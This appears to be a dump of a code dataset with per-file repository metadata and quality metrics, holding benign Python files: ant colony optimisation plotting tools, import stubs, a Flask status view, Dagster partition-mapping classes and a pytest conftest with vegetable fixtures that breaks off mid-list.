hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d3127c44f939aa6f284fa7cf5ddb67cb5977ea13
| 13,996
|
py
|
Python
|
antco/tools.py
|
FernandoGaGu/Ant-Colony-Optimisation
|
e1a1ee27f55c63c768964e80f38020f1aef664d7
|
[
"BSD-3-Clause"
] | 1
|
2021-09-09T04:14:06.000Z
|
2021-09-09T04:14:06.000Z
|
antco/tools.py
|
FernandoGaGu/Ant-Colony-Optimisation
|
e1a1ee27f55c63c768964e80f38020f1aef664d7
|
[
"BSD-3-Clause"
] | null | null | null |
antco/tools.py
|
FernandoGaGu/Ant-Colony-Optimisation
|
e1a1ee27f55c63c768964e80f38020f1aef664d7
|
[
"BSD-3-Clause"
] | null | null | null |
# Module containing frequently used tools already implemented.
#
# Author: Fernando García Gutiérrez
# Email: fegarc05@ucm.es
#
import numpy as np
import matplotlib.pyplot as plt
from .base import ScoreScaler
class MinMaxScaler(ScoreScaler):
"""
Class that performs Min-Max scaling and scales the values to the range defined by
[min_val, max_val].
Parameters
----------
min_val: float, default=0.0
Minimum value to scale values to.
max_val: float, default=1.0
Maximum value to scale values to.
max_historic: bool, default=False
Parameter indicating whether to use the best historical score as the maximum value for
Min-Max scaling.
"""
def __init__(self, min_val: float = 0.0, max_val: float = 1.0, max_historic: bool = False):
self._min_val = min_val
self._max_val = max_val
self._max_historic = max_historic
def __repr__(self):
return f'MinMaxScaler(min_val={self._min_val}, max_val={self._max_val}, ' \
f'max_historic={self._max_historic})'
def scale(self, ant_scores: np.ndarray, best_historic: float):
min_score = np.min(ant_scores)
max_score = best_historic if self._max_historic else np.max(ant_scores)
if min_score == max_score: # To avoid zero division error
return np.ones(shape=ant_scores.shape)
return ((ant_scores - min_score) / (max_score - min_score)) * \
(self._max_val - self._min_val) + self._min_val
class HyperparameterCheckerAS(object):
"""
Class to plot the effects of the hyperparameters associated with the Ant System (AS) pheromone
updating strategy on pheromone updating.
The plot() method will plot two graphs, the first one representing the increase in the values
of the pheromone matrix assuming that all ants used for its update are used, i.e. in a real
case all ants that have visited the same connection, and the second one the decrease in the
value of the pheromone matrix when no ant visits a given connection during all the plotted
interactions.
In the increment graph, several lines will be plotted, each corresponding to the random
assignment of a score to each ant in the range of values indicated in the legend.
Parameters
----------
n_ants: int
Number of ants used for updating the pheromone matrix.
pher_init: float
Initial value of the pheromone matrix.
evaporation: float
Pheromone evaporation parameter.
weight: float, default=1.0
Weight used to model the contribution of each ant to the pheromone update (it is assumed
that the ants' scores have been scaled to the range [0,1]).
seed: int, default=None
Random seed.
Methods
-------
plot(num_iterations: int = 100, figsize: tuple = (10, 10), linewidth: float = 2.5,
title_size: int = 15, save_plot: str = None):
Method to plotting the increase and decrease of pheromone matrix values over specified
interactions.
"""
def __init__(self, n_ants: int, pher_init: float, evaporation: float, weight: float = 1.0,
seed: int = None):
self.n_ants = n_ants
self.pher_init = pher_init
self.evaporation = evaporation
self.weight = weight
self.seed = seed
def plot(self, num_iterations: int = 100, figsize: tuple = (10, 10), linewidth: float = 2.5,
title_size: int = 15, save_plot: str = None):
"""
Parameters
----------
num_iterations: int, default=100
Number of interactions to simulate.
figsize: tuple, default=(10, 10)
Tuple indicating the size of the figure.
linewidth: float, default=2.5
Thickness of the lines in the plot.
title_size: int, default=15
Size of the title of each graphic.
save_plot: str, default=None
File in which to save the generated graph, if no value is provided the graph will not
be saved.
"""
iterations = [it for it in range(num_iterations)]
pher_increase_100 = self._pherIncrease(
n_ants=self.n_ants, pher_init=self.pher_init, evaporation=self.evaporation,
weight=self.weight, iterations=iterations, score_range=(0.99, 1.0), seed=self.seed)
pher_increase_75 = self._pherIncrease(
n_ants=self.n_ants, pher_init=self.pher_init, evaporation=self.evaporation,
weight=self.weight, iterations=iterations, score_range=(0.75, 1.0), seed=self.seed)
pher_increase_50 = self._pherIncrease(
n_ants=self.n_ants, pher_init=self.pher_init, evaporation=self.evaporation,
weight=self.weight, iterations=iterations, score_range=(0.50, 1.0), seed=self.seed)
pher_increase_25 = self._pherIncrease(
n_ants=self.n_ants, pher_init=self.pher_init, evaporation=self.evaporation,
weight=self.weight, iterations=iterations, score_range=(0.25, 1.0), seed=self.seed)
pher_decrease = self._pherDecrease(
pher_init=self.pher_init, evaporation=self.evaporation, iterations=iterations)
fig, axes = plt.subplots(2, figsize=figsize)
axes[0].plot(iterations, pher_increase_100, label='Scores [0.99-1.0]', color='#641E16',
linewidth=linewidth)
axes[0].plot(iterations, pher_increase_75, label='Scores [0.75-1.0]', color='#A93226',
linewidth=linewidth)
axes[0].plot(iterations, pher_increase_50, label='Scores [0.50-1.0]', color='#D98880',
linewidth=linewidth)
axes[0].plot(iterations, pher_increase_25, label='Scores [0.25-1.0]', color='#F2D7D5',
linewidth=linewidth)
axes[1].plot(iterations, pher_decrease, color='#2980B9', linewidth=linewidth)
axes[0].set_title('Pheromone increase', fontsize=title_size)
axes[0].spines['top'].set_visible(False)
axes[0].spines['right'].set_visible(False)
axes[0].legend()
axes[1].set_title('Pheromone decrease', fontsize=title_size)
axes[1].spines['top'].set_visible(False)
axes[1].spines['right'].set_visible(False)
if save_plot is not None:
plt.savefig(save_plot, dpi=150)
plt.show()
@staticmethod
def _pherIncrease(n_ants: int, pher_init: float, evaporation: float, weight: float,
iterations: list, score_range: tuple, seed: int):
""" Simulate the pheromone update (increasing the values) according to the AS update
strategy. """
if seed is not None:
np.random.seed(seed)
pher_increase = []
pher = pher_init
for it in iterations:
score = np.sum(
np.random.uniform(low=score_range[0], high=score_range[1], size=n_ants) * weight)
pher = (1 - evaporation) * pher + score * weight
pher_increase.append(pher)
return pher_increase
@staticmethod
def _pherDecrease(pher_init: float, evaporation: float, iterations: list):
""" Simulate the pheromone update (decreasing the values) according to the AS update
strategy. """
pher_decrease = []
pher = pher_init
for it in iterations:
pher = (1 - evaporation) * pher
pher_decrease.append(pher)
return pher_decrease
class HyperparameterCheckerMMAS(object):
"""
Class to plot the effects of the hyperparameters associated with the Min-Max Ant System (MMAS)
pheromone updating strategy on pheromone updating.
The plot() method will plot two graphs, the first one representing the increase in the values
of the pheromone matrix assuming that all ants used for its update are used, i.e. in a real
case all ants that have visited the same connection, and the second one the decrease in the
value of the pheromone matrix when no ant visits a given connection during all the plotted
interactions.
In the increment graph, several lines will be plotted, each corresponding to the random
assignment of a score to each ant in the range of values indicated in the legend.
Parameters
----------
n_ants: int
Number of ants used for updating the pheromone matrix.
pher_init: float
Initial value of the pheromone matrix.
evaporation: float
Pheromone evaporation parameter.
limits: tuple
Bounds of the MMAS update strategy.
weight: float, default=1.0
Weight used to model the contribution of each ant to the pheromone update (it is assumed
that the ants' scores have been scaled to the range [0,1]).
seed: int, default=None
Random seed.
Methods
-------
plot(num_iterations: int = 100, figsize: tuple = (10, 10), linewidth: float = 2.5,
title_size: int = 15, save_plot: str = None):
Method to plotting the increase and decrease of pheromone matrix values over specified
interactions.
"""
def __init__(self, n_ants: int, pher_init: float, evaporation: float, limits: tuple,
weight: float = 1.0, seed: int = None):
self.n_ants = n_ants
self.pher_init = pher_init
self.evaporation = evaporation
self.limits = limits
self.weight = weight
self.seed = seed
def plot(self, num_iterations: int = 100, figsize: tuple = (10, 10), linewidth: float = 2.5,
title_size: int = 15, save_plot: str = None):
"""
Parameters
----------
num_iterations: int, default=100
Number of interactions to simulate.
figsize: tuple, default=(10, 10)
Tuple indicating the size of the figure.
linewidth: float, default=2.5
Thickness of the lines in the plot.
title_size: int, default=15
Size of the title of each graphic.
save_plot: str, default=None
File in which to save the generated graph, if no value is provided the graph will not
be saved.
"""
iterations = [it for it in range(num_iterations)]
pher_increase_100 = self._pherIncrease(
n_ants=self.n_ants, pher_init=self.pher_init, evaporation=self.evaporation,
limits=self.limits, weight=self.weight, iterations=iterations, score_range=(0.99, 1.0),
seed=self.seed)
pher_increase_75 = self._pherIncrease(
n_ants=self.n_ants, pher_init=self.pher_init, evaporation=self.evaporation,
limits=self.limits, weight=self.weight, iterations=iterations, score_range=(0.75, 1.0),
seed=self.seed)
pher_increase_50 = self._pherIncrease(
n_ants=self.n_ants, pher_init=self.pher_init, evaporation=self.evaporation,
limits=self.limits, weight=self.weight, iterations=iterations, score_range=(0.50, 1.0),
seed=self.seed)
pher_increase_25 = self._pherIncrease(
n_ants=self.n_ants, pher_init=self.pher_init, evaporation=self.evaporation,
limits=self.limits, weight=self.weight, iterations=iterations, score_range=(0.25, 1.0),
seed=self.seed)
pher_decrease = self._pherDecrease(
pher_init=self.pher_init, evaporation=self.evaporation, limits=self.limits,
iterations=iterations)
fig, axes = plt.subplots(2, figsize=figsize)
axes[0].plot(iterations, pher_increase_100, label='Scores [0.99-1.0]', color='#641E16',
linewidth=linewidth)
axes[0].plot(iterations, pher_increase_75, label='Scores [0.75-1.0]', color='#A93226',
linewidth=linewidth)
axes[0].plot(iterations, pher_increase_50, label='Scores [0.50-1.0]', color='#D98880',
linewidth=linewidth)
axes[0].plot(iterations, pher_increase_25, label='Scores [0.25-1.0]', color='#F2D7D5',
linewidth=linewidth)
axes[1].plot(iterations, pher_decrease, color='#2980B9', linewidth=linewidth)
axes[0].set_title('Pheromone increase', fontsize=title_size)
axes[0].spines['top'].set_visible(False)
axes[0].spines['right'].set_visible(False)
axes[0].legend()
axes[1].set_title('Pheromone decrease', fontsize=title_size)
axes[1].spines['top'].set_visible(False)
axes[1].spines['right'].set_visible(False)
if save_plot is not None:
plt.savefig(save_plot, dpi=150)
plt.show()
@staticmethod
def _pherIncrease(n_ants: int, pher_init: float, evaporation: float, limits: tuple, weight: float,
iterations: list, score_range: tuple, seed: int):
""" Simulate the pheromone update (increasing the values) according to the MMAS update
strategy. """
if seed is not None:
np.random.seed(seed)
pher_increase = []
pher = pher_init
for it in iterations:
scores = np.random.uniform(low=score_range[0], high=score_range[1], size=n_ants)
for score in scores:
pher = (1 - evaporation) * pher + score * weight
if pher < limits[0]:
pher = limits[0]
if pher > limits[1]:
pher = limits[1]
pher_increase.append(pher)
return pher_increase
@staticmethod
def _pherDecrease(pher_init: float, evaporation: float, limits: tuple, iterations: list):
""" Simulate the pheromone update (decreasing the values) according to the MMAS update
strategy. """
pher_decrease = []
pher = pher_init
for it in iterations:
pher = (1 - evaporation) * pher
if pher < limits[0]:
pher = limits[0]
if pher > limits[1]:
pher = limits[1]
pher_decrease.append(pher)
return pher_decrease
| 41.286136
| 102
| 0.638325
| 1,834
| 13,996
| 4.738277
| 0.119956
| 0.033142
| 0.012428
| 0.018412
| 0.881243
| 0.874223
| 0.861795
| 0.851784
| 0.850403
| 0.850403
| 0
| 0.029028
| 0.266505
| 13,996
| 338
| 103
| 41.408284
| 0.817456
| 0.333024
| 0
| 0.731707
| 0
| 0
| 0.046642
| 0.010887
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067073
| false
| 0
| 0.018293
| 0.006098
| 0.146341
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d357d177b7c6a0066ad523bfd74841b7f6fa0b5b
| 156
|
py
|
Python
|
source-py/pyBKT/models/__init__.py
|
bukeplato/pyBKT
|
733a4ccf0de78bef7d47b5a6af7131c7778560db
|
[
"MIT"
] | 132
|
2018-03-22T06:04:14.000Z
|
2022-03-24T21:54:27.000Z
|
source-py/pyBKT/models/__init__.py
|
bukeplato/pyBKT
|
733a4ccf0de78bef7d47b5a6af7131c7778560db
|
[
"MIT"
] | 25
|
2018-01-10T14:00:48.000Z
|
2022-03-22T04:00:47.000Z
|
source-py/pyBKT/models/__init__.py
|
bukeplato/pyBKT
|
733a4ccf0de78bef7d47b5a6af7131c7778560db
|
[
"MIT"
] | 46
|
2017-09-12T04:30:58.000Z
|
2022-03-10T08:54:52.000Z
|
from pyBKT.models.Model import Model
from pyBKT.models.Roster import Roster
from pyBKT.models.Roster import StateType
from pyBKT.models.Roster import State
| 31.2
| 41
| 0.846154
| 24
| 156
| 5.5
| 0.333333
| 0.272727
| 0.454545
| 0.477273
| 0.613636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 156
| 4
| 42
| 39
| 0.942857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d38e03fe8d9f816898be5a70acf974eb983ebdbf
| 123
|
py
|
Python
|
blueprint/__init__.py
|
mr-aliraza/custom-python-project-blueprint
|
5e55fb56c523606a887c8db9c04d781d25062ddc
|
[
"MIT"
] | null | null | null |
blueprint/__init__.py
|
mr-aliraza/custom-python-project-blueprint
|
5e55fb56c523606a887c8db9c04d781d25062ddc
|
[
"MIT"
] | null | null | null |
blueprint/__init__.py
|
mr-aliraza/custom-python-project-blueprint
|
5e55fb56c523606a887c8db9c04d781d25062ddc
|
[
"MIT"
] | null | null | null |
from .app import Server # noqa: F401
from .grpc import Echoer # noqa: F401
from .generated import echo_pb2 # noqa: F401
| 30.75
| 45
| 0.731707
| 19
| 123
| 4.684211
| 0.578947
| 0.269663
| 0.269663
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10101
| 0.195122
| 123
| 3
| 46
| 41
| 0.79798
| 0.260163
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d39a97c96505081d97f2fb83d8992825523019d3
| 78
|
py
|
Python
|
app/views/up.py
|
valentinDruzhinin/CategoryMappingApp
|
8d9bd64d0284c0024a851592e9e9d2bc06606557
|
[
"MIT"
] | null | null | null |
app/views/up.py
|
valentinDruzhinin/CategoryMappingApp
|
8d9bd64d0284c0024a851592e9e9d2bc06606557
|
[
"MIT"
] | null | null | null |
app/views/up.py
|
valentinDruzhinin/CategoryMappingApp
|
8d9bd64d0284c0024a851592e9e9d2bc06606557
|
[
"MIT"
] | null | null | null |
from flask import jsonify
def up():
return jsonify({'status': 'happy'})
| 13
| 39
| 0.653846
| 10
| 78
| 5.1
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.192308
| 78
| 5
| 40
| 15.6
| 0.809524
| 0
| 0
| 0
| 0
| 0
| 0.141026
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
6caa18f47d7257c1cb835c1a4dc1e1aea06e5f29
| 2,900
|
py
|
Python
|
python_modules/dagster/dagster/core/asset_defs/partition_mapping.py
|
rpatil524/dagster
|
6f918d94cbd543ab752ab484a65e3a40fd441716
|
[
"Apache-2.0"
] | null | null | null |
python_modules/dagster/dagster/core/asset_defs/partition_mapping.py
|
rpatil524/dagster
|
6f918d94cbd543ab752ab484a65e3a40fd441716
|
[
"Apache-2.0"
] | null | null | null |
python_modules/dagster/dagster/core/asset_defs/partition_mapping.py
|
rpatil524/dagster
|
6f918d94cbd543ab752ab484a65e3a40fd441716
|
[
"Apache-2.0"
] | 1
|
2019-09-11T03:02:27.000Z
|
2019-09-11T03:02:27.000Z
|
from abc import ABC, abstractmethod
from dagster.core.definitions.partition import PartitionsDefinition
from dagster.core.definitions.partition_key_range import PartitionKeyRange
class PartitionMapping(ABC):
"""Defines a correspondence between the partitions in an asset and the partitions in an asset
that it depends on.
"""
@abstractmethod
def get_upstream_partitions_for_partition_range(
self,
downstream_partition_key_range: PartitionKeyRange,
downstream_partitions_def: PartitionsDefinition,
upstream_partitions_def: PartitionsDefinition,
) -> PartitionKeyRange:
"""Returns the range of partition keys in the upstream asset that include data necessary
to compute the contents of the given partition key range in the downstream asset.
Args:
downstream_partition_key_range (PartitionKeyRange): The range of partition keys in the
downstream asset.
downstream_partitions_def (PartitionsDefinition): The partitions definition for the
downstream asset.
upstream_partitions_def (PartitionsDefinition): The partitions definition for the
upstream asset.
"""
@abstractmethod
def get_downstream_partitions_for_partition_range(
self,
upstream_partition_key_range: PartitionKeyRange,
downstream_partitions_def: PartitionsDefinition,
upstream_partitions_def: PartitionsDefinition,
) -> PartitionKeyRange:
"""Returns the range of partition keys in the downstream asset that use the data in the given
partition key range of the downstream asset.
Args:
upstream_partition_key_range (PartitionKeyRange): The range of partition keys in the
upstream asset.
downstream_partitions_def (PartitionsDefinition): The partitions definition for the
downstream asset.
upstream_partitions_def (PartitionsDefinition): The partitions definition for the
upstream asset.
"""
class IdentityPartitionMapping(PartitionMapping):
def get_upstream_partitions_for_partition_range(
self,
downstream_partition_key_range: PartitionKeyRange,
downstream_partitions_def: PartitionsDefinition, # pylint: disable=unused-argument
upstream_partitions_def: PartitionsDefinition, # pylint: disable=unused-argument
) -> PartitionKeyRange:
return downstream_partition_key_range
def get_downstream_partitions_for_partition_range(
self,
upstream_partition_key_range: PartitionKeyRange,
downstream_partitions_def: PartitionsDefinition, # pylint: disable=unused-argument
upstream_partitions_def: PartitionsDefinition, # pylint: disable=unused-argument
) -> PartitionKeyRange:
return upstream_partition_key_range
| 43.283582
| 101
| 0.72931
| 288
| 2,900
| 7.100694
| 0.184028
| 0.076284
| 0.193643
| 0.099756
| 0.807824
| 0.718826
| 0.718826
| 0.718826
| 0.718826
| 0.696333
| 0
| 0
| 0.227241
| 2,900
| 66
| 102
| 43.939394
| 0.912539
| 0.425862
| 0
| 0.787879
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.121212
| false
| 0
| 0.090909
| 0.060606
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6caafb4eff3832720c175d5e7fc195cd38085813
| 37,652
|
py
|
Python
|
tests/conftest.py
|
swright573/django-vertical-multi-columns
|
f2188b71a3b1743a1acf0dbc90ee20289ea8bacd
|
[
"BSD-2-Clause"
] | 2
|
2021-04-07T14:25:43.000Z
|
2021-07-01T14:08:19.000Z
|
tests/conftest.py
|
swright573/django-vertical-multi-columns
|
f2188b71a3b1743a1acf0dbc90ee20289ea8bacd
|
[
"BSD-2-Clause"
] | 3
|
2021-02-17T15:16:06.000Z
|
2021-03-30T13:17:01.000Z
|
tests/conftest.py
|
swright573/django-vertical-multi-columns
|
f2188b71a3b1743a1acf0dbc90ee20289ea8bacd
|
[
"BSD-2-Clause"
] | 1
|
2021-02-11T13:50:52.000Z
|
2021-02-11T13:50:52.000Z
|
# -*- coding: utf-8 -*-
"""
Common elements for pytest tests
"""
import random
import pytest # pylint: disable=import-error
from django.conf import settings # pylint: disable=import-error
def pytest_configure():
"""Initialize Django settings"""
settings.configure(
INSTALLED_APPS=[
"vertical_multi_columns",
]
)
# Fixtures for setting NUMBER_OF_COLUMNS
@pytest.fixture()
def settings_number_of_columns_null():
"""There is no setting for NUMBER_OF_COLUMNS"""
settings.VERTICAL_MULTI_COLUMNS = None
@pytest.fixture()
def settings_number_of_columns_2():
"""Django setting for NUMBER_OF_COLUMNS is 2"""
settings.VERTICAL_MULTI_COLUMNS = [{"NUMBER_OF_COLUMNS": 2}]
@pytest.fixture()
def settings_number_of_columns_3():
"""Django setting for NUMBER_OF_COLUMNS is 3"""
settings.VERTICAL_MULTI_COLUMNS = [{"NUMBER_OF_COLUMNS": 3}]
@pytest.fixture()
def settings_number_of_columns_4():
"""Django setting for NUMBER_OF_COLUMNS is 4"""
settings.VERTICAL_MULTI_COLUMNS = [{"NUMBER_OF_COLUMNS": 4}]
@pytest.fixture()
def settings_number_of_columns_5():
"""Django setting for NUMBER_OF_COLUMNS is 5"""
settings.VERTICAL_MULTI_COLUMNS = [{"NUMBER_OF_COLUMNS": 5}]
# Fixtures for representing data input to a VMC view
@pytest.fixture()
def entries_27():
"""Input data with 27 entries"""
return [
{"id": 5, "name": "Asparagus", "colour": "green", "count": 9, "herb": False},
{"id": 2, "name": "Basil", "colour": "green", "count": 5, "herb": True},
{"id": 6, "name": "Beans", "colour": "yellow", "count": 5, "herb": False},
{"id": 8, "name": "Broccoli", "colour": "green", "count": 8, "herb": False},
{"id": 9, "name": "Brussels Sprouts", "colour": "green", "count": 16, "herb": False},
{"id": 10, "name": "Cabbage", "colour": "green", "count": 7, "herb": False},
{"id": 21, "name": "Cantaloupe", "colour": "orange", "count": 10, "herb": False},
{"id": 11, "name": "Cauliflower", "colour": "white", "count": 11, "herb": False},
{"id": 12, "name": "Celery", "colour": "green", "count": 6, "herb": False},
{"id": 13, "name": "Chives", "colour": "green", "count": 6, "herb": True},
{"id": 38, "name": "Cilantro", "colour": "green", "count": 8, "herb": True},
{"id": 14, "name": "Collard Greens", "colour": "green", "count": 14, "herb": False},
{"id": 45, "name": "Dill", "colour": "green", "count": 4, "herb": True},
{"id": 36, "name": "Oregano", "colour": "green", "count": 7, "herb": True},
{"id": 39, "name": "Parsley", "colour": "green", "count": 7, "herb": True},
{"id": 22, "name": "Parsnips", "colour": "white", "count": 8, "herb": False},
{"id": 23, "name": "Peas", "colour": "green", "count": 4, "herb": False},
{"id": 25, "name": "Potatoes", "colour": "white", "count": 8, "herb": False},
{"id": 26, "name": "Pumpkins", "colour": "orange", "count": 8, "herb": False},
{"id": 37, "name": "Rosemary", "colour": "green", "count": 8, "herb": True},
{"id": 41, "name": "Sage", "colour": "green", "count": 4, "herb": True},
{"id": 29, "name": "Spinach", "colour": "green", "count": 7, "herb": False},
{"id": 30, "name": "Summer Squash", "colour": "yellow", "count": 12, "herb": False},
{"id": 16, "name": "Sweet Corn", "colour": "yellow", "count": 10, "herb": False},
{"id": 33, "name": "Watermelon", "colour": "red", "count": 10, "herb": False},
{"id": 34, "name": "Winter Squash", "colour": "orange", "count": 13, "herb": False},
]
@pytest.fixture()
def entries_4():
"""Input data with 4 entries"""
return [
{"id": 5, "name": "Asparagus", "colour": "green", "count": 9, "herb": False},
{"id": 20, "name": "Kale", "colour": "green", "count": 4, "herb": False},
{"id": 44, "name": "Sweet Potato", "colour": "orange", "count": 12, "herb": False},
{"id": 34, "name": "Winter Squash", "colour": "orange", "count": 13, "herb": False},
]
@pytest.fixture()
def entries_0():
"""Empty input data"""
return []
# Fixtures for representing data out
@pytest.fixture()
def columns_4():
"""4 columns of out data, each having a varying number of entries"""
return [
[
{"id": 5, "name": "Asparagus", "colour": "green", "count": 9, "herb": False},
{"id": 2, "name": "Basil", "colour": "green", "count": 5, "herb": True},
{"id": 6, "name": "Beans", "colour": "yellow", "count": 5, "herb": False},
{"id": 8, "name": "Broccoli", "colour": "green", "count": 8, "herb": False},
],
[{"id": 48, "name": "Fred"}, {"id": 19, "name": "Garlic"}],
[
{"id": 26, "name": "Pumpkins", "colour": "orange", "count": 8, "herb": False},
{"id": 37, "name": "Rosemary", "colour": "green", "count": 8, "herb": True},
{"id": 41, "name": "Sage", "colour": "green", "count": 4, "herb": True},
{"id": 29, "name": "Spinach", "colour": "green", "count": 7, "herb": False},
{"id": 30, "name": "Summer Squash", "colour": "yellow", "count": 12, "herb": False},
],
[
{"id": 16, "name": "Sweet Corn", "colour": "yellow", "count": 10, "herb": False},
{"id": 33, "name": "Watermelon", "colour": "red", "count": 10, "herb": False},
{"id": 34, "name": "Winter Squash", "colour": "orange", "count": 13, "herb": False},
],
]
@pytest.fixture()
def columns_2():
"""2 columns of out data, each having a varying number of entries"""
return [
[
